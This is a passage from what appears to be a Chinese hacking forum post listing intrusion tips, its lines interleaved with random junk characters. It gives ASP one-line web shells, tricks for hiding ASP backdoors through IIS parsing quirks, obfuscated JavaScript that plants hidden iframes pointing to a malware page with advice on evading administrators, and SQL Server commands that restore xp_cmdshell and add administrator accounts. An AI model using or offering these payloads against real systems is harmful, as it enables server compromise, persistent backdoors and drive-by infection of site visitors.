" y  z( q; c$ z2 f6 A! C; C# Bc).%><%execute request("go")%><%  U/ f3 N7 A% K
d).<script language=VBScript runat=server>execute request("sb")</Script>
9 Y$ i1 T' Y1 S) Z& v/ V: Ae).<%25Execute(request("l"))%25>
* o9 O, K' W$ ^# Af).<%if request("cmd")<>"" then execute request("pass")%>
5 D" R4 `+ O6 Z
5 _( d. E5 o) y" n. R52、at "12:17" /interactive cmd* t& Y6 W+ m! m# x
执行后可以用AT命令查看新加的任务% ]/ Y7 e4 I3 {% l; Q  m, E
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。7 L( u# k% B, |- G$ d; |
' k0 \' \+ Z. ?0 a) `/ D) e
53、隐藏ASP后门的两种方法& i$ \& B/ K+ C
1、建立非标准目录:mkdir images..\
5 H5 l; o5 X1 X/ C5 w) l6 b2 U( _拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp# A# b& s% E4 T; H) [2 k
通过web访问ASP木马:http://ip/images../news.asp?action=login7 p; l$ @% _8 h- S
如何删除非标准目录:rmdir images..\ /s
7 j$ B5 z7 O& b3 v8 S9 z2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:& C! s( S: h0 i% V" p0 T+ R) C7 [
mkdir programme.asp- |4 J- o( T' X/ O
新建1.txt文件内容:<!--#include file=”12.jpg”-->
0 U) s0 o+ N5 \% D  E新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
4 _+ ?4 W+ N2 V: o0 Oattrib +H +S programme.asp
$ x0 a+ G- y2 Q2 H+ {通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt. T" m% s! r; e
; m8 f! L  d3 |- @- D
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。, V( t2 a4 [$ y1 J0 w
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
& f9 ^7 b  s1 u; E+ r/ v, D& }( C( q5 L/ s( D: k
55、JS隐蔽挂马" R; ]* }4 T; {3 k; H1 O7 D
1.& D  l+ k! E) |& q% R1 s6 W
var tr4c3="<iframe src=ht";
% ?# f5 |$ e. `# A) l8 gtr4c3 = tr4c3+"tp:/";$ p1 J0 s3 _& T) _9 F- I
tr4c3 = tr4c3+"/ww";
% h4 K. n2 d* E8 G9 H$ Vtr4c3 = tr4c3+"w.tr4";
* L) m' b. D- _3 htr4c3 = tr4c3+"c3.com/inc/m";
  x) N+ o. u1 c8 r. Atr4c3 = tr4c3+"m.htm style="display:none"></i";
$ w2 |. Q1 n* ^7 k/ M: otr4c3 =tr4c3+"frame>'";8 f: W  A% Q  ~! ^% Z% Q
document.write(tr4c3);
8 F2 l1 h. k  ~5 V  \; }避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
! C+ d7 X7 `6 \% L* j$ E$ A# g& z0 s% g5 c+ r4 m
2.# @' f1 R$ ?: c3 P
转换进制,然后用EVAL执行。如) t2 q+ a- c4 S9 h) j$ ^/ [% ]
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");) g! ?9 R8 S$ x% y1 T0 @3 }2 C
不过这个有点显眼。' k) @2 Q8 Q% |7 ^& d  G2 N8 F
3.7 D- ^6 I" }0 P1 W
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
! ~" N( [( J: U) L最后一点,别忘了把文件的时间也修改下。
- a  h+ J: V( U" U( m
$ b! @  f! Z; ~# f: b3 P; S56.3389终端入侵常用DOS命令
+ P' J) Y1 c8 ~$ U! E3 dtaskkill taskkill /PID 1248 /t- X1 @- ~% p, ?4 E) V

, ~) W, H  I$ H) G7 E# H( T3 htasklist 查进程; }) v2 Z5 q3 Q
9 M. N+ _$ G, _
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
; w( e# U6 L3 eiisreset /reboot
: P3 f1 P0 m7 e9 C$ p# mtsshutdn /reboot /delay:1    重起服务器( Q" q# j! @& r5 S% N

  e( N; W* E) I2 f: f; R: S/ A' Ulogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
. A& v' R! ~* c" f
# \' E( w# o7 U! N$ ]query user 查看当前终端用户在线情况; O) z% B& x( d

. q# @0 a( _! w* ^9 A, Z" V$ h要显示有关所有会话使用的进程的信息,请键入:query process *: B5 Z$ t& n+ Y' A$ c
( s* x6 b$ I$ r
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
6 U7 E. d, ?8 @# `+ t  P1 ?! l) k5 ^; G0 M' |8 Y& ]! o! R
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2: P6 ^6 V9 L5 b7 I6 E# ?8 L

8 j1 x0 k- X& U( i* @3 {要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
7 X7 h2 _4 ~3 j
8 {) H/ L) c+ i% [6 \命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启; E. L" ~. k5 O/ |6 y
! q( ~- c( F' j  O1 K% H7 v- }- G/ K
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
4 u3 z9 T+ S# T0 N) O) q# }7 D! F( I6 U" [+ B
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
9 S3 e( }3 q7 M1 i
0 C: c  I4 c4 {, j9 Q命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机/ f2 |6 v/ Q0 d# f

) `* n0 b. A2 _  O  T9 j7 H( m7 `56、在地址栏或按Ctrl+O,输入:
; }( G+ Q7 y' `: ~! }) s) |javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;" }& c, q* J8 x/ `+ _( {4 ]2 k
. `& w' ?% U. {! E0 F
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。8 S# G# }) [# c) {& m4 s1 L1 ?

* N/ ~/ ^# u- K& ~7 {57、net user的时候,是不能显示加$的用户,但是如果不处理的话,% G% w: b* Z2 ]- H, {. ~0 h. F
用net localgroup administrators是可以看到管理组下,加了$的用户的。
2 H$ M; o+ G" h* i1 \4 ]
% P& @: b+ F1 R2 L58、 sa弱口令相关命令
4 b# c+ y% V# }" [$ x7 |6 K7 }. ?( v# F7 I3 g. Q
一.更改sa口令方法:' |! F$ L4 o1 |3 N
用sql综合利用工具连接后,执行命令:$ R6 Q  i7 a2 x
exec sp_password NULL,'20001001','sa'
, g5 P8 m$ h, y8 h; T(提示:慎用!)
' g3 M% ~5 w$ D+ R# T" n
/ L- _5 k, g: L二.简单修补sa弱口令.
) q2 ], h& U: s/ J" w, j! f1 p& s. f! q
$ G, s  X2 D7 ~; b5 W8 B' P3 K方法1:查询分离器连接后执行:' C' p& v% o( G# ?
if exists (select * from
1 }' D4 L9 D4 V& edbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and- ^5 V9 r7 g" q6 q+ f
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)5 v1 P1 ~7 f' a9 q2 \5 S9 ~$ L* t+ y
) |* ~: l/ l7 k4 l) L
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
" i# f" O2 ^" F/ i, }5 N, l, ?1 D- G1 j6 d" r: h, e, e" S
GO
; K- l- U3 n# q* P9 J  ?& F% [  J8 ], R  u5 q7 r: Q2 R
然后按F5键命令执行完毕0 G+ l, ]- Y  r; T. e
* s7 C0 ^" p+ y! c! j
方法2:查询分离器连接后
, I1 _, S: h% `5 S1 [! B0 r5 f+ ]第一步执行:use master3 k+ i, i+ C% n$ v2 H0 L
第二步执行:sp_dropextendedproc 'xp_cmdshell'
% D) O3 c- G5 Y5 d8 Q然后按F5键命令执行完毕
7 Y% J. C, @6 S6 k  H; y: ?: w  }5 `) t) {. ~9 K/ N% k9 r) n

2 o( Q6 a4 M: |5 N- l; p三.常见情况恢复执行xp_cmdshell.
  O( o2 K; h" M+ L% q2 J5 L
8 Z1 e" l3 [0 q" x- W8 i3 V' J1 B
( E" V, O. |' q$ y9 N1 未能找到存储过程'master..xpcmdshell'.9 |# G2 z4 T+ v  I1 {
   恢复方法:查询分离器连接后,- `5 K9 Q, @( M& j4 |- a6 Z
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int$ c+ K- G: f0 W8 T6 l
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
  `* L" F, H; `, P7 E$ O* A% H* t然后按F5键命令执行完毕
' @, \' Z3 |- P0 V) D
4 I& o$ K' p9 t, d0 f# `' \( w2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。); n& W: a' g; ]" K( O0 L
恢复方法:查询分离器连接后,7 _) N3 Y7 t" k8 l  s7 g
第一步执行:sp_dropextendedproc "xp_cmdshell"
: E* `# `4 \7 h  N第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'$ `, w# Q, v8 Y0 j
然后按F5键命令执行完毕0 b4 y2 O9 y& Y( K' h
0 o2 v1 d" x- n% u( H( w  n
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。), k4 M4 D% E% {
恢复方法:查询分离器连接后,
1 Z2 _% h- o/ n- [& G第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
( n8 {8 w' G0 s# k2 f: G' y第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
: }+ C2 C; z# X- ^* Z7 \$ Y然后按F5键命令执行完毕
6 E( X+ Q( |2 w8 `( S+ W
. a) }/ L. l& f4 ~四.终极方法.- H* j: g2 f' D5 }& x
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:6 A5 U, F9 Q$ F7 d% f% F
查询分离器连接后,& _" a- \$ }+ u/ A- t! a
2000servser系统:
" G% E' [: R- Fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
5 y( O8 r  u7 F! O0 d5 |" H: \- ^/ ?* w5 c  H' _5 x4 f2 g
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
7 {* _7 K0 z) H5 J. X4 M4 Q/ y9 @2 L+ y$ l, J; b' B& H
xp或2003server系统:
% ?- R  }7 J3 f8 Z$ l1 H# u9 e* A) b3 }+ o4 }8 T3 A7 l
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'- }0 x0 y1 h5 x  p9 y( t1 M, V$ R

1 i& `8 t3 B  w& S; k- Sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'0 F" N8 g2 @) m4 z& z1 W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表